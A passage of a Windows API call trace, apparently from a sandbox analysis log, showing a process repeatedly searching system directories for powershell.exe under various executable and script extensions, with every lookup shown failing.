	[0122.917] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ed630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0122.917] SetErrorMode (uMode=0x1) returned 0x1
	[0122.918] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe.JSE", lpFindFileData=0x1c7ed7d0 | out: lpFindFileData=0x1c7ed7d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.918] SetErrorMode (uMode=0x1) returned 0x1
	[0122.919] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ed630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0122.919] SetErrorMode (uMode=0x1) returned 0x1
	[0122.919] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe.WSF", lpFindFileData=0x1c7ed7d0 | out: lpFindFileData=0x1c7ed7d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.920] SetErrorMode (uMode=0x1) returned 0x1
	[0122.920] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ed630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0122.920] SetErrorMode (uMode=0x1) returned 0x1
	[0122.920] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe.WSH", lpFindFileData=0x1c7ed7d0 | out: lpFindFileData=0x1c7ed7d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.921] SetErrorMode (uMode=0x1) returned 0x1
	[0122.921] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ed630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0122.921] SetErrorMode (uMode=0x1) returned 0x1
	[0122.921] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe.MSC", lpFindFileData=0x1c7ed7d0 | out: lpFindFileData=0x1c7ed7d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.922] SetErrorMode (uMode=0x1) returned 0x1
	[0122.923] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7ed630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0122.923] SetErrorMode (uMode=0x1) returned 0x1
	[0122.923] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.exe", lpFindFileData=0x1c7ed7d0 | out: lpFindFileData=0x1c7ed7d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.923] SetErrorMode (uMode=0x1) returned 0x1
	[0122.923] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7ed630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0122.924] SetErrorMode (uMode=0x1) returned 0x1
	[0122.924] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.exe.ps1", lpFindFileData=0x1c7ed7d0 | out: lpFindFileData=0x1c7ed7d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.924] SetErrorMode (uMode=0x1) returned 0x1
	[0122.924] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7ed630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0122.924] SetErrorMode (uMode=0x1) returned 0x1
	[0122.924] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.exe.psm1", lpFindFileData=0x1c7ed7d0 | out: lpFindFileData=0x1c7ed7d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.924] SetErrorMode (uMode=0x1) returned 0x1
	[0122.925] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7ed630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0122.925] SetErrorMode (uMode=0x1) returned 0x1
	[0122.925] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.exe.psd1", lpFindFileData=0x1c7ed7d0 | out: lpFindFileData=0x1c7ed7d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.925] SetErrorMode (uMode=0x1) returned 0x1
	[0122.925] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7ed630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0122.925] SetErrorMode (uMode=0x1) returned 0x1
	[0122.925] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.exe.COM", lpFindFileData=0x1c7ed7d0 | out: lpFindFileData=0x1c7ed7d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.926] SetErrorMode (uMode=0x1) returned 0x1
	[0122.926] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7ed630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0122.926] SetErrorMode (uMode=0x1) returned 0x1
	[0122.926] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.exe.EXE", lpFindFileData=0x1c7ed7d0 | out: lpFindFileData=0x1c7ed7d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.926] SetErrorMode (uMode=0x1) returned 0x1
	[0122.926] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7ed630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0122.926] SetErrorMode (uMode=0x1) returned 0x1
	[0122.927] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.exe.BAT", lpFindFileData=0x1c7ed7d0 | out: lpFindFileData=0x1c7ed7d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.927] SetErrorMode (uMode=0x1) returned 0x1
	[0122.927] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7ed630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0122.927] SetErrorMode (uMode=0x1) returned 0x1
	[0122.927] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.exe.CMD", lpFindFileData=0x1c7ed7d0 | out: lpFindFileData=0x1c7ed7d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.927] SetErrorMode (uMode=0x1) returned 0x1
	[0122.927] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7ed630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0122.928] SetErrorMode (uMode=0x1) returned 0x1
	[0122.928] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.exe.VBS", lpFindFileData=0x1c7ed7d0 | out: lpFindFileData=0x1c7ed7d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.928] SetErrorMode (uMode=0x1) returned 0x1
	[0122.928] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7ed630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0122.928] SetErrorMode (uMode=0x1) returned 0x1
	[0122.928] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.exe.VBE", lpFindFileData=0x1c7ed7d0 | out: lpFindFileData=0x1c7ed7d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.929] SetErrorMode (uMode=0x1) returned 0x1
	[0122.929] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7ed630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0122.929] SetErrorMode (uMode=0x1) returned 0x1
	[0122.929] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.exe.JS", lpFindFileData=0x1c7ed7d0 | out: lpFindFileData=0x1c7ed7d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.929] SetErrorMode (uMode=0x1) returned 0x1
	[0122.929] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7ed630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0122.929] SetErrorMode (uMode=0x1) returned 0x1
	[0122.930] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.exe.JSE", lpFindFileData=0x1c7ed7d0 | out: lpFindFileData=0x1c7ed7d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.930] SetErrorMode (uMode=0x1) returned 0x1
	[0122.930] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7ed630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0122.930] SetErrorMode (uMode=0x1) returned 0x1
	[0122.930] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.exe.WSF", lpFindFileData=0x1c7ed7d0 | out: lpFindFileData=0x1c7ed7d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.930] SetErrorMode (uMode=0x1) returned 0x1
	[0122.930] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7ed630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0122.931] SetErrorMode (uMode=0x1) returned 0x1
	[0122.931] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.exe.WSH", lpFindFileData=0x1c7ed7d0 | out: lpFindFileData=0x1c7ed7d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.931] SetErrorMode (uMode=0x1) returned 0x1
	[0122.931] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7ed630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0122.931] SetErrorMode (uMode=0x1) returned 0x1
	[0122.931] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.exe.MSC", lpFindFileData=0x1c7ed7d0 | out: lpFindFileData=0x1c7ed7d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.931] SetErrorMode (uMode=0x1) returned 0x1
	[0122.932] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7ed630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0122.932] SetErrorMode (uMode=0x1) returned 0x1
	[0122.932] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.exe", lpFindFileData=0x1c7ed7d0 | out: lpFindFileData=0x1c7ed7d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.932] SetErrorMode (uMode=0x1) returned 0x1
	[0122.932] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7ed630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0122.932] SetErrorMode (uMode=0x1) returned 0x1
	[0122.932] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.exe.ps1", lpFindFileData=0x1c7ed7d0 | out: lpFindFileData=0x1c7ed7d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.933] SetErrorMode (uMode=0x1) returned 0x1
	[0122.933] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7ed630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0122.933] SetErrorMode (uMode=0x1) returned 0x1
	[0122.933] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.exe.psm1", lpFindFileData=0x1c7ed7d0 | out: lpFindFileData=0x1c7ed7d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.933] SetErrorMode (uMode=0x1) returned 0x1
	[0122.933] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7ed630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0122.934] SetErrorMode (uMode=0x1) returned 0x1
	[0122.934] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.exe.psd1", lpFindFileData=0x1c7ed7d0 | out: lpFindFileData=0x1c7ed7d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.934] SetErrorMode (uMode=0x1) returned 0x1
	[0122.934] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7ed630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0122.934] SetErrorMode (uMode=0x1) returned 0x1
	[0122.934] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.exe.COM", lpFindFileData=0x1c7ed7d0 | out: lpFindFileData=0x1c7ed7d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.935] SetErrorMode (uMode=0x1) returned 0x1
	[0122.935] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7ed630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0122.935] SetErrorMode (uMode=0x1) returned 0x1
	[0122.935] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.exe.EXE", lpFindFileData=0x1c7ed7d0 | out: lpFindFileData=0x1c7ed7d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.935] SetErrorMode (uMode=0x1) returned 0x1
	[0122.935] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7ed630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0122.935] SetErrorMode (uMode=0x1) returned 0x1
	[0122.935] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.exe.BAT", lpFindFileData=0x1c7ed7d0 | out: lpFindFileData=0x1c7ed7d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.936] SetErrorMode (uMode=0x1) returned 0x1
	[0122.936] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7ed630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0122.936] SetErrorMode (uMode=0x1) returned 0x1
	[0122.936] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.exe.CMD", lpFindFileData=0x1c7ed7d0 | out: lpFindFileData=0x1c7ed7d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.936] SetErrorMode (uMode=0x1) returned 0x1
	[0122.936] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7ed630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0122.937] SetErrorMode (uMode=0x1) returned 0x1
	[0122.937] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.exe.VBS", lpFindFileData=0x1c7ed7d0 | out: lpFindFileData=0x1c7ed7d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.937] SetErrorMode (uMode=0x1) returned 0x1
	[0122.937] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7ed630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0122.937] SetErrorMode (uMode=0x1) returned 0x1
	[0122.937] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.exe.VBE", lpFindFileData=0x1c7ed7d0 | out: lpFindFileData=0x1c7ed7d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.937] SetErrorMode (uMode=0x1) returned 0x1
	[0122.938] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7ed630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0122.938] SetErrorMode (uMode=0x1) returned 0x1
	[0122.938] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.exe.JS", lpFindFileData=0x1c7ed7d0 | out: lpFindFileData=0x1c7ed7d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.938] SetErrorMode (uMode=0x1) returned 0x1
